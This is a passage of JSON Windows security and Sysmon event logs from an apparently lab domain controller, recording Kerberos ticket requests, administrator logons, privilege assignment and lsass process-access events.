07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220558,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220559,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{7055C927-4FD0-7911-159F-059014CFB7B9}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{7055C927-4FD0-7911-159F-059014CFB7B9}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220560,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{7055C927-4FD0-7911-159F-059014CFB7B9}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{7055C927-4FD0-7911-159F-059014CFB7B9}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220561,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7CAEC\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{7055C927-4FD0-7911-159F-059014CFB7B9}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7caec","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{7055C927-4FD0-7911-159F-059014CFB7B9}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220562,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7CAEC\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7caec","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5005,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.549\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.549","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5006,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.549\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.549","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5007,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.549\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.549","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5008,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.565\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.565","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5009,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.565\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 